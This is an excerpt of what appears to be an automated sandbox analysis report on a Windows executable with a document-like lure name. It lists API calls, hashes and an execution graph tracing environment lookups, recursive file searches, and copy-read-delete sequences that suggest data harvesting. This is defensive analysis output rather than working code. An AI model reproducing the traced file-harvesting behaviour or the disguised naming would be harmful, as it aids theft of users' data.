                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-3370423016
                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                            • Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                            • Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
                                                            • CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                            • Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                            • Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

                                                            Execution Graph

                                                            Execution Coverage:2.6%
                                                            Dynamic/Decrypted Code Coverage:96.8%
                                                            Signature Coverage:1.5%
                                                            Total number of Nodes:1718
                                                            Total number of Limit Nodes:5
7538->7541 7540 36f77429 7540->7524 7541->7540 7719 36f75351 7720 36f75360 7719->7720 7721 36f75374 7719->7721 7720->7721 7724 36f7571e 20 API calls 7720->7724 7722 36f7571e 20 API calls 7721->7722 7723 36f75386 7722->7723 7725 36f7571e 20 API calls 7723->7725 7724->7721 7726 36f75399 7725->7726 7727 36f7571e 20 API calls 7726->7727 7728 36f753aa 7727->7728 7729 36f7571e 20 API calls 7728->7729 7730 36f753bb 7729->7730 6820 36f736d0 6821 36f736e2 6820->6821 6823 36f736f0 6820->6823 6822 36f72ada 5 API calls 6821->6822 6822->6823 6841 36f73c90 RtlUnwind 7542 36f74bdd 7543 36f74bec 7542->7543 7544 36f74c08 7542->7544 7543->7544 7545 36f74bf2 7543->7545 7546 36f76d60 51 API calls 7544->7546 7547 36f76368 20 API calls 7545->7547 7548 36f74c0f GetModuleFileNameA 7546->7548 7549 36f74bf7 7547->7549 7550 36f74c33 7548->7550 7551 36f762ac 26 API calls 7549->7551 7565 36f74d01 7550->7565 7552 36f74c01 7551->7552 7555 36f74e76 20 API calls 7556 36f74c5d 7555->7556 7557 36f74c66 7556->7557 7558 36f74c72 7556->7558 7559 36f76368 20 API calls 7557->7559 7560 36f74d01 38 API calls 7558->7560 7564 36f74c6b 7559->7564 7562 36f74c88 7560->7562 7561 36f7571e 20 API calls 7561->7552 7563 36f7571e 20 API calls 7562->7563 7562->7564 7563->7564 7564->7561 7567 36f74d26 7565->7567 7569 36f74d86 7567->7569 7571 36f770eb 7567->7571 7568 36f74c50 7568->7555 7569->7568 7570 36f770eb 38 API calls 7569->7570 7570->7569 7574 36f77092 7571->7574 7575 36f754a7 38 API calls 7574->7575 7576 36f770a6 7575->7576 7576->7567 7016 36f7281c 7017 36f72882 27 API calls 7016->7017 7018 36f7282a 7017->7018 6025 36f71c5b 6026 36f71c6b 6025->6026 6029 36f712ee 6026->6029 6028 36f71c87 6030 36f71324 6029->6030 6031 36f713b7 GetEnvironmentVariableW 6030->6031 6055 36f710f1 6031->6055 6034 36f710f1 57 API calls 6035 36f71465 6034->6035 6036 36f710f1 57 API calls 6035->6036 6037 36f71479 6036->6037 6038 36f710f1 57 API calls 6037->6038 6039 36f7148d 6038->6039 6040 36f710f1 57 API calls 6039->6040 6041 36f714a1 
6040->6041 6042 36f710f1 57 API calls 6041->6042 6043 36f714b5 lstrlenW 6042->6043 6044 36f714d2 6043->6044 6045 36f714d9 lstrlenW 6043->6045 6044->6028 6046 36f710f1 57 API calls 6045->6046 6047 36f71501 lstrlenW lstrcatW 6046->6047 6048 36f710f1 57 API calls 6047->6048 6049 36f71539 lstrlenW lstrcatW 6048->6049 6050 36f710f1 57 API calls 6049->6050 6051 36f7156b lstrlenW lstrcatW 6050->6051 6052 36f710f1 57 API calls 6051->6052 6053 36f7159d lstrlenW lstrcatW 6052->6053 6054 36f710f1 57 API calls 6053->6054 6054->6044 6056 36f71118 6055->6056 6057 36f71129 lstrlenW 6056->6057 6068 36f72c40 6057->6068 6060 36f71177 lstrlenW FindFirstFileW 6062 36f711e1 6060->6062 6063 36f711a0 6060->6063 6061 36f71168 lstrlenW 6061->6060 6062->6034 6064 36f711c7 FindNextFileW 6063->6064 6065 36f711aa 6063->6065 6064->6063 6067 36f711da FindClose 6064->6067 6065->6064 6070 36f71000 6065->6070 6067->6062 6069 36f71148 lstrcatW lstrlenW 6068->6069 6069->6060 6069->6061 6071 36f71022 6070->6071 6072 36f710af 6071->6072 6073 36f7102f lstrcatW lstrlenW 6071->6073 6074 36f710b5 lstrlenW 6072->6074 6085 36f710ad 6072->6085 6075 36f7106b lstrlenW 6073->6075 6076 36f7105a lstrlenW 6073->6076 6101 36f71e16 6074->6101 6087 36f71e89 lstrlenW 6075->6087 6076->6075 6079 36f710ca 6082 36f71e89 5 API calls 6079->6082 6079->6085 6080 36f71088 GetFileAttributesW 6081 36f7109c 6080->6081 6080->6085 6081->6085 6093 36f7173a 6081->6093 6084 36f710df 6082->6084 6106 36f711ea 6084->6106 6085->6065 6088 36f72c40 6087->6088 6089 36f71ea7 lstrcatW lstrlenW 6088->6089 6090 36f71ec2 6089->6090 6091 36f71ed1 lstrcatW 6089->6091 6090->6091 6092 36f71ec7 lstrlenW 6090->6092 6091->6080 6092->6091 6094 36f71747 6093->6094 6121 36f71cca 6094->6121 6097 36f7199f 6097->6085 6099 36f71824 6099->6097 6141 36f715da 6099->6141 6102 36f71e29 6101->6102 6105 36f71e4c 6101->6105 6103 36f71e2d lstrlenW 6102->6103 6102->6105 6104 36f71e3f lstrlenW 6103->6104 6103->6105 6104->6105 6105->6079 6107 36f7120e 6106->6107 6108 
36f71e89 5 API calls 6107->6108 6109 36f71220 GetFileAttributesW 6108->6109 6110 36f71246 6109->6110 6111 36f71235 6109->6111 6112 36f71e89 5 API calls 6110->6112 6111->6110 6113 36f7173a 35 API calls 6111->6113 6114 36f71258 6112->6114 6113->6110 6115 36f710f1 56 API calls 6114->6115 6116 36f7126d 6115->6116 6117 36f71e89 5 API calls 6116->6117 6118 36f7127f 6117->6118 6119 36f710f1 56 API calls 6118->6119 6120 36f712e6 6119->6120 6120->6085 6122 36f71cf1 6121->6122 6123 36f71d0f CopyFileW CreateFileW 6122->6123 6124 36f71d55 GetFileSize 6123->6124 6125 36f71d44 DeleteFileW 6123->6125 6126 36f71ede 22 API calls 6124->6126 6130 36f71808 6125->6130 6127 36f71d66 ReadFile 6126->6127 6128 36f71d94 CloseHandle DeleteFileW 6127->6128 6129 36f71d7d CloseHandle DeleteFileW 6127->6129 6128->6130 6129->6130 6130->6097 6131 36f71ede 6130->6131 6133 36f7222f 6131->6133 6134 36f7224e 6133->6134 6136 36f72250 6133->6136 6149 36f7474f 6133->6149 6154 36f747e5 6133->6154 6134->6099 6140 36f72908 6136->6140 6161 36f735d2 6136->6161 6137 36f735d2 RaiseException 6139 36f72925 6137->6139 6139->6099 6140->6137 6142 36f7160c 6141->6142 6143 36f7163c lstrlenW 6142->6143 6249 36f71c9d 6143->6249 6145 36f71655 lstrcatW lstrlenW 6146 36f71678 6145->6146 6147 36f71693 6146->6147 6148 36f7167e lstrcatW 6146->6148 6147->6099 6148->6147 6164 36f74793 6149->6164 6152 36f7478f 6152->6133 6153 36f74765 6170 36f72ada 6153->6170 6156 36f756d0 6154->6156 6155 36f7570e 6183 36f76368 6155->6183 6156->6155 6158 36f756f9 RtlAllocateHeap 6156->6158 6160 36f7474f 7 API calls 6156->6160 6158->6156 6159 36f7570c 6158->6159 6159->6133 6160->6156 6163 36f735f2 RaiseException 6161->6163 6163->6140 6165 36f7479f 6164->6165 6177 36f75671 RtlEnterCriticalSection 6165->6177 6167 36f747aa 6178 36f747dc 6167->6178 6169 36f747d1 6169->6153 6171 36f72ae5 IsProcessorFeaturePresent 6170->6171 6172 36f72ae3 6170->6172 6174 36f72b58 6171->6174 6172->6152 6182 36f72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter 
GetCurrentProcess TerminateProcess 6174->6182 6176 36f72c3b 6176->6152 6177->6167 6181 36f756b9 RtlLeaveCriticalSection 6178->6181 6180 36f747e3 6180->6169 6181->6180 6182->6176 6186 36f75b7a GetLastError 6183->6186 6187 36f75b93 6186->6187 6188 36f75b99 6186->6188 6205 36f75e08 6187->6205 6192 36f75bf0 SetLastError 6188->6192 6212 36f7637b 6188->6212 6193 36f75bf9 6192->6193 6193->6159 6194 36f75bb3 6219 36f7571e 6194->6219 6198 36f75bb9 6200 36f75be7 SetLastError 6198->6200 6199 36f75bcf 6232 36f7593c 6199->6232 6200->6193 6203 36f7571e 17 API calls 6204 36f75be0 6203->6204 6204->6192 6204->6200 6237 36f75c45 6205->6237 6207 36f75e2f 6208 36f75e47 TlsGetValue 6207->6208 6209 36f75e3b 6207->6209 6208->6209 6210 36f72ada 5 API calls 6209->6210 6211 36f75e58 6210->6211 6211->6188 6213 36f76388 6212->6213 6214 36f763c8 6213->6214 6215 36f763b3 RtlAllocateHeap 6213->6215 6218 36f7474f 7 API calls 6213->6218 6216 36f76368 19 API calls 6214->6216 6215->6213 6217 36f75bab 6215->6217 6216->6217 6217->6194 6225 36f75e5e 6217->6225 6218->6213 6220 36f75752 6219->6220 6221 36f75729 HeapFree 6219->6221 6220->6198 6221->6220 6222 36f7573e 6221->6222 6223 36f76368 18 API calls 6222->6223 6224 36f75744 GetLastError 6223->6224 6224->6220 6226 36f75c45 5 API calls 6225->6226 6227 36f75e85 6226->6227 6228 36f75ea0 TlsSetValue 6227->6228 6229 36f75e94 6227->6229 6228->6229 6230 36f72ada 5 API calls 6229->6230 6231 36f75bc8 6230->6231 6231->6194 6231->6199 6243 36f75914 6232->6243 6240 36f75c71 6237->6240 6242 36f75c75 6237->6242 6238 36f75c95 6241 36f75ca1 GetProcAddress 6238->6241 6238->6242 6239 36f75ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6239->6240 6240->6238 6240->6239 6240->6242 6241->6242 6242->6207 6244 36f75854 RtlEnterCriticalSection RtlLeaveCriticalSection 6243->6244 6245 36f75938 6244->6245 6246 36f758c4 6245->6246 6247 36f75758 20 API calls 6246->6247 6248 36f758e8 6247->6248 6248->6203 6250 36f71ca6 6249->6250 6250->6145 6842 36f74a9a 6843 36f75411 
38 API calls 6842->6843 6844 36f74aa2 6843->6844 7577 36f77bc7 7578 36f77bd3 7577->7578 7579 36f77c0a 7578->7579 7585 36f75671 RtlEnterCriticalSection 7578->7585 7581 36f77be7 7582 36f77f86 20 API calls 7581->7582 7583 36f77bf7 7582->7583 7586 36f77c10 7583->7586 7585->7581 7589 36f756b9 RtlLeaveCriticalSection 7586->7589 7588 36f77c17 7588->7579 7589->7588 7590 36f7a1c6 IsProcessorFeaturePresent 7731 36f7a945 7732 36f7a96d 7731->7732 7733 36f7a9a5 7732->7733 7734 36f7a997 7732->7734 7735 36f7a99e 7732->7735 7737 36f7aa17 21 API calls 7734->7737 7740 36f7aa00 7735->7740 7739 36f7a99c 7737->7739 7741 36f7aa20 7740->7741 7742 36f7b19b 21 API calls 7741->7742 7743 36f7a9a3 7742->7743 7744 36f7af43 7745 36f7af4d 7744->7745 7746 36f7af59 7744->7746 7745->7746 7747 36f7af52 CloseHandle 7745->7747 7747->7746 8081 36f75303 8084 36f750a5 8081->8084 8093 36f7502f 8084->8093 8087 36f7502f 5 API calls 8088 36f750c3 8087->8088 8089 36f75000 20 API calls 8088->8089 8090 36f750ce 8089->8090 8091 36f75000 20 API calls 8090->8091 8092 36f750d9 8091->8092 8096 36f75048 8093->8096 8094 36f72ada 5 API calls 8095 36f75069 8094->8095 8095->8087 8096->8094 8097 36f77103 GetCommandLineA GetCommandLineW 6845 36f77a80 6846 36f77a8d 6845->6846 6847 36f7637b 20 API calls 6846->6847 6848 36f77aa7 6847->6848 6849 36f7571e 20 API calls 6848->6849 6850 36f77ab3 6849->6850 6851 36f7637b 20 API calls 6850->6851 6855 36f77ad9 6850->6855 6852 36f77acd 6851->6852 6854 36f7571e 20 API calls 6852->6854 6854->6855 6856 36f77ae5 6855->6856 6857 36f75eb7 6855->6857 6858 36f75c45 5 API calls 6857->6858 6859 36f75ede 6858->6859 6860 36f75efc InitializeCriticalSectionAndSpinCount 6859->6860 6861 36f75ee7 6859->6861 6860->6861 6862 36f72ada 5 API calls 6861->6862 6863 36f75f13 6862->6863 6863->6855 6963 36f78640 6966 36f78657 6963->6966 6967 36f78665 6966->6967 6968 36f78679 6966->6968 6969 36f76368 20 API calls 6967->6969 6970 36f78693 6968->6970 6971 36f78681 6968->6971 6972 36f7866a 6969->6972 6975 36f754a7 
38 API calls 6970->6975 6978 36f78652 6970->6978 6973 36f76368 20 API calls 6971->6973 6976 36f762ac 26 API calls 6972->6976 6974 36f78686 6973->6974 6977 36f762ac 26 API calls 6974->6977 6975->6978 6976->6978 6977->6978 6979 36f7284f 6982 36f72882 6979->6982 6985 36f73550 6982->6985 6984 36f7285d 6986 36f7358a 6985->6986 6987 36f7355d 6985->6987 6986->6984 6987->6986 6988 36f747e5 21 API calls 6987->6988 6989 36f7357a 6988->6989 6989->6986 6990 36f7544d 26 API calls 6989->6990 6990->6986 6991 36f7724e GetProcessHeap 7019 36f7220c 7020 36f72215 7019->7020 7021 36f7221a 7019->7021 7025 36f722b1 7020->7025 7029 36f720db 7021->7029 7024 36f72228 7026 36f722c7 7025->7026 7028 36f722d0 7026->7028 7037 36f72264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7026->7037 7028->7021 7030 36f720e7 7029->7030 7034 36f7210b 7030->7034 7036 36f720f6 7030->7036 7038 36f71eec 7030->7038 7032 36f7216d 7033 36f71eec 50 API calls 7032->7033 7032->7036 7033->7036 7034->7032 7035 36f71eec 50 API calls 7034->7035 7034->7036 7035->7032 7036->7024 7037->7028 7039 36f71ef7 7038->7039 7040 36f71f2a 7038->7040 7042 36f71f1c 7039->7042 7043 36f71efc 7039->7043 7081 36f72049 7040->7081 7063 36f71f3f 7042->7063 7045 36f71f12 7043->7045 7047 36f71f01 7043->7047 7055 36f723ec 7045->7055 7049 36f71f06 7047->7049 7050 36f7240b 7047->7050 7049->7034 7095 36f753e5 7050->7095 7204 36f73513 7055->7204 7060 36f72408 7060->7049 7061 36f7351e 7 API calls 7062 36f723f5 7061->7062 7062->7049 7064 36f71f4b 7063->7064 7222 36f7247c 7064->7222 7066 36f71f52 7067 36f72041 7066->7067 7068 36f71f7c 7066->7068 7075 36f71f57 7066->7075 7245 36f72639 IsProcessorFeaturePresent 7067->7245 7233 36f723de 7068->7233 7071 36f72048 7072 36f71f8b 7072->7075 7236 36f722fc RtlInitializeSListHead 7072->7236 7074 36f71f99 7237 36f746c5 7074->7237 7075->7049 7079 36f71fb8 7079->7075 7080 36f74669 5 API calls 7079->7080 7080->7075 7083 36f72055 7081->7083 7082 36f7205e 7082->7049 7083->7082 
7084 36f720d3 7083->7084 7085 36f7207d 7083->7085 7086 36f72639 4 API calls 7084->7086 7322 36f7244c 7085->7322 7088 36f720da 7086->7088 7089 36f72082 7331 36f72308 7089->7331 7091 36f72087 7334 36f720c4 7091->7334 7093 36f7209f 7337 36f7260b 7093->7337 7101 36f75aca 7095->7101 7098 36f7351e 7175 36f73820 7098->7175 7100 36f72415 7100->7049 7102 36f75ad4 7101->7102 7104 36f72410 7101->7104 7103 36f75e08 11 API calls 7102->7103 7105 36f75adb 7103->7105 7104->7098 7105->7104 7106 36f75e5e 11 API calls 7105->7106 7107 36f75aee 7106->7107 7109 36f759b5 7107->7109 7110 36f759d0 7109->7110 7111 36f759c0 7109->7111 7110->7104 7115 36f759d6 7111->7115 7114 36f7571e 20 API calls 7114->7110 7116 36f759ef 7115->7116 7117 36f759e9 7115->7117 7119 36f7571e 20 API calls 7116->7119 7118 36f7571e 20 API calls 7117->7118 7118->7116 7120 36f759fb 7119->7120 7121 36f7571e 20 API calls 7120->7121 7122 36f75a06 7121->7122 7123 36f7571e 20 API calls 7122->7123 7124 36f75a11 7123->7124 7125 36f7571e 20 API calls 7124->7125 7126 36f75a1c 7125->7126 7127 36f7571e 20 API calls 7126->7127 7128 36f75a27 7127->7128 7129 36f7571e 20 API calls 7128->7129 7130 36f75a32 7129->7130 7131 36f7571e 20 API calls 7130->7131 7132 36f75a3d 7131->7132 7133 36f7571e 20 API calls 7132->7133 7134 36f75a48 7133->7134 7135 36f7571e 20 API calls 7134->7135 7136 36f75a56 7135->7136 7141 36f7589c 7136->7141 7147 36f757a8 7141->7147 7143 36f758c0 7144 36f758ec 7143->7144 7159 36f75809 7144->7159 7146 36f75910 7146->7114 7148 36f757b4 7147->7148 7155 36f75671 RtlEnterCriticalSection 7148->7155 7150 36f757e8 7156 36f757fd 7150->7156 7152 36f757be 7152->7150 7154 36f7571e 20 API calls 7152->7154 7153 36f757f5 7153->7143 7154->7150 7155->7152 7157 36f756b9 RtlLeaveCriticalSection 7156->7157 7158 36f75807 7157->7158 7158->7153 7160 36f75815 7159->7160 7167 36f75671 RtlEnterCriticalSection 7160->7167 7162 36f7581f 7168 36f75a7f 7162->7168 7164 36f75832 7172 36f75848 7164->7172 7166 36f75840 7166->7146 7167->7162 7169 
36f75a8e 7168->7169 7171 36f75ab5 7168->7171 7170 36f77cc2 20 API calls 7169->7170 7169->7171 7170->7171 7171->7164 7173 36f756b9 RtlLeaveCriticalSection 7172->7173 7174 36f75852 7173->7174 7174->7166 7176 36f7384b 7175->7176 7177 36f7382d 7175->7177 7176->7100 7178 36f7383b 7177->7178 7181 36f73b67 7177->7181 7186 36f73ba2 7178->7186 7191 36f73a82 7181->7191 7183 36f73b81 7184 36f73b99 TlsGetValue 7183->7184 7185 36f73b8d 7183->7185 7184->7185 7185->7178 7187 36f73a82 5 API calls 7186->7187 7188 36f73bbc 7187->7188 7189 36f73bd7 TlsSetValue 7188->7189 7190 36f73bcb 7188->7190 7189->7190 7190->7176 7192 36f73aa6 7191->7192 7193 36f73aaa 7191->7193 7192->7183 7193->7192 7197 36f739be 7193->7197 7196 36f73ac4 GetProcAddress 7196->7192 7202 36f739cd 7197->7202 7198 36f739ea LoadLibraryExW 7200 36f73a05 GetLastError 7198->7200 7198->7202 7199 36f73a77 7199->7192 7199->7196 7200->7202 7201 36f73a60 FreeLibrary 7201->7202 7202->7198 7202->7199 7202->7201 7203 36f73a38 LoadLibraryExW 7202->7203 7203->7202 7210 36f73856 7204->7210 7206 36f723f1 7206->7062 7207 36f753da 7206->7207 7208 36f75b7a 20 API calls 7207->7208 7209 36f723fd 7208->7209 7209->7060 7209->7061 7211 36f73862 GetLastError 7210->7211 7212 36f7385f 7210->7212 7213 36f73b67 6 API calls 7211->7213 7212->7206 7214 36f73877 7213->7214 7215 36f738dc SetLastError 7214->7215 7216 36f73ba2 6 API calls 7214->7216 7221 36f73896 7214->7221 7215->7206 7217 36f73890 7216->7217 7218 36f738b8 7217->7218 7219 36f73ba2 6 API calls 7217->7219 7217->7221 7220 36f73ba2 6 API calls 7218->7220 7218->7221 7219->7218 7220->7221 7221->7215 7223 36f72485 7222->7223 7249 36f72933 IsProcessorFeaturePresent 7223->7249 7227 36f72496 7228 36f7249a 7227->7228 7260 36f753c8 7227->7260 7228->7066 7231 36f724b1 7231->7066 7316 36f724b5 7233->7316 7235 36f723e5 7235->7072 7236->7074 7240 36f746dc 7237->7240 7238 36f72ada 5 API calls 7239 36f71fad 7238->7239 7239->7075 7241 36f723b3 7239->7241 7240->7238 7242 36f723b8 7241->7242 7243 36f72933 
IsProcessorFeaturePresent 7242->7243 7244 36f723c1 7242->7244 7243->7244 7244->7079 7246 36f7264e 7245->7246 7247 36f726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7246->7247 7248 36f72744 7247->7248 7248->7071 7250 36f72491 7249->7250 7251 36f734ea 7250->7251 7252 36f734ef 7251->7252 7271 36f73936 7252->7271 7256 36f73510 7256->7227 7257 36f73505 7257->7256 7285 36f73972 7257->7285 7259 36f734fd 7259->7227 7308 36f77457 7260->7308 7263 36f73529 7264 36f73543 7263->7264 7265 36f73532 7263->7265 7264->7228 7266 36f7391b 6 API calls 7265->7266 7267 36f73537 7266->7267 7268 36f73972 RtlDeleteCriticalSection 7267->7268 7269 36f7353c 7268->7269 7312 36f73c50 7269->7312 7272 36f7393f 7271->7272 7274 36f73968 7272->7274 7276 36f734f9 7272->7276 7289 36f73be0 7272->7289 7275 36f73972 RtlDeleteCriticalSection 7274->7275 7275->7276 7276->7259 7277 36f738e8 7276->7277 7294 36f73af1 7277->7294 7280 36f738fd 7280->7257 7281 36f73ba2 6 API calls 7282 36f7390b 7281->7282 7283 36f73918 7282->7283 7299 36f7391b 7282->7299 7283->7257 7286 36f7399c 7285->7286 7287 36f7397d 7285->7287 7286->7259 7288 36f73987 RtlDeleteCriticalSection 7287->7288 7288->7286 7288->7288 7290 36f73a82 5 API calls 7289->7290 7291 36f73bfa 7290->7291 7292 36f73c18 InitializeCriticalSectionAndSpinCount 7291->7292 7293 36f73c03 7291->7293 7292->7293 7293->7272 7295 36f73a82 5 API calls 7294->7295 7296 36f73b0b 7295->7296 7297 36f73b24 TlsAlloc 7296->7297 7298 36f738f2 7296->7298 7298->7280 7298->7281 7300 36f73925 7299->7300 7301 36f7392b 7299->7301 7303 36f73b2c 7300->7303 7301->7280 7304 36f73a82 5 API calls 7303->7304 7305 36f73b46 7304->7305 7306 36f73b5e TlsFree 7305->7306 7307 36f73b52 7305->7307 7306->7307 7307->7301 7309 36f77470 7308->7309 7310 36f72ada 5 API calls 7309->7310 7311 36f724a3 7310->7311 7311->7231 7311->7263 7313 36f73c7f 7312->7313 7314 36f73c59 7312->7314 7313->7264 7314->7313 7315 36f73c69 FreeLibrary 7314->7315 7315->7314 7317 36f724c4 7316->7317 7318 
36f724c8 7316->7318 7317->7235 7319 36f72639 4 API calls 7318->7319 7321 36f724d5 7318->7321 7320 36f72559 7319->7320 7321->7235 7323 36f72451 7322->7323 7324 36f72455 7323->7324 7325 36f72461 7323->7325 7326 36f7527a 20 API calls 7324->7326 7328 36f7246e 7325->7328 7329 36f7499b 28 API calls 7325->7329 7327 36f7245f 7326->7327 7327->7089 7328->7089 7330 36f74bbd 7329->7330 7330->7089 7343 36f734c7 RtlInterlockedFlushSList 7331->7343 7333 36f72312 7333->7091 7345 36f7246f 7334->7345 7336 36f720c9 7336->7093 7338 36f72617 7337->7338 7339 36f7262d 7338->7339 7364 36f753ed 7338->7364 7339->7082 7342 36f73529 8 API calls 7342->7339 7344 36f734d7 7343->7344 7344->7333 7350 36f753ff 7345->7350 7348 36f7391b 6 API calls 7349 36f7354d 7348->7349 7349->7336 7353 36f75c2b 7350->7353 7354 36f75c35 7353->7354 7355 36f72476 7353->7355 7357 36f75db2 7354->7357 7355->7348 7358 36f75c45 5 API calls 7357->7358 7359 36f75dd9 7358->7359 7360 36f75df1 TlsFree 7359->7360 7361 36f75de5 7359->7361 7360->7361 7362 36f72ada 5 API calls 7361->7362 7363 36f75e02 7362->7363 7363->7355 7367 36f774da 7364->7367 7369 36f774f3 7367->7369 7368 36f72ada 5 API calls 7370 36f72625 7368->7370 7369->7368 7370->7342 7591 405b7c lstrlenW 7592 405b8a 7591->7592 7593 405b90 CharPrevW 7592->7593 7594 405b9c 7592->7594 7593->7592 7593->7594 6868 36f78a89 6869 36f76d60 51 API calls 6868->6869 6870 36f78a8e 6869->6870 7748 36f75348 7749 36f73529 8 API calls 7748->7749 7750 36f7534f 7749->7750 7751 36f77b48 7761 36f78ebf 7751->7761 7755 36f77b55 7774 36f7907c 7755->7774 7758 36f77b7f 7759 36f7571e 20 API calls 7758->7759 7760 36f77b8a 7759->7760 7778 36f78ec8 7761->7778 7763 36f77b50 7764 36f78fdc 7763->7764 7765 36f78fe8 7764->7765 7798 36f75671 RtlEnterCriticalSection 7765->7798 7767 36f78ff3 7768 36f7905e 7767->7768 7770 36f79032 RtlDeleteCriticalSection 7767->7770 7799 36f7a09c 7767->7799 7812 36f79073 7768->7812 7772 36f7571e 20 API calls 7770->7772 7772->7767 7773 36f7906a 7773->7755 7775 36f77b64 
RtlDeleteCriticalSection 7774->7775 7776 36f79092 7774->7776 7775->7755 7775->7758 7776->7775 7777 36f7571e 20 API calls 7776->7777 7777->7775 7779 36f78ed4 7778->7779 7788 36f75671 RtlEnterCriticalSection 7779->7788 7781 36f78f77 7793 36f78f97 7781->7793 7785 36f78ee3 7785->7781 7787 36f78e78 66 API calls 7785->7787 7789 36f77b94 RtlEnterCriticalSection 7785->7789 7790 36f78f6d 7785->7790 7786 36f78f83 7786->7763 7787->7785 7788->7785 7789->7785 7796 36f77ba8 RtlLeaveCriticalSection 7790->7796 7792 36f78f75 7792->7785 7797 36f756b9 RtlLeaveCriticalSection 7793->7797 7795 36f78f9e 7795->7786 7796->7792 7797->7795 7798->7767 7800 36f7a0a8 7799->7800 7801 36f7a0ce 7800->7801 7802 36f7a0b9 7800->7802 7811 36f7a0c9 7801->7811 7815 36f77b94 RtlEnterCriticalSection 7801->7815 7803 36f76368 20 API calls 7802->7803 7805 36f7a0be 7803->7805 7807 36f762ac 26 API calls 7805->7807 7806 36f7a0ea 7816 36f7a026 7806->7816 7807->7811 7809 36f7a0f5 7832 36f7a112 7809->7832 7811->7767 8080 36f756b9 RtlLeaveCriticalSection 7812->8080 7814 36f7907a 7814->7773 7815->7806 7817 36f7a033 7816->7817 7818 36f7a048 7816->7818 7819 36f76368 20 API calls 7817->7819 7823 36f7a043 7818->7823 7835 36f78e12 7818->7835 7820 36f7a038 7819->7820 7822 36f762ac 26 API calls 7820->7822 7822->7823 7823->7809 7825 36f7907c 20 API calls 7826 36f7a064 7825->7826 7841 36f77a5a 7826->7841 7828 36f7a06a 7848 36f7adce 7828->7848 7831 36f7571e 20 API calls 7831->7823 8079 36f77ba8 RtlLeaveCriticalSection 7832->8079 7834 36f7a11a 7834->7811 7836 36f78e2a 7835->7836 7838 36f78e26 7835->7838 7837 36f77a5a 26 API calls 7836->7837 7836->7838 7839 36f78e4a 7837->7839 7838->7825 7863 36f79a22 7839->7863 7842 36f77a66 7841->7842 7843 36f77a7b 7841->7843 7844 36f76368 20 API calls 7842->7844 7843->7828 7845 36f77a6b 7844->7845 7846 36f762ac 26 API calls 7845->7846 7847 36f77a76 7846->7847 7847->7828 7849 36f7adf2 7848->7849 7850 36f7addd 7848->7850 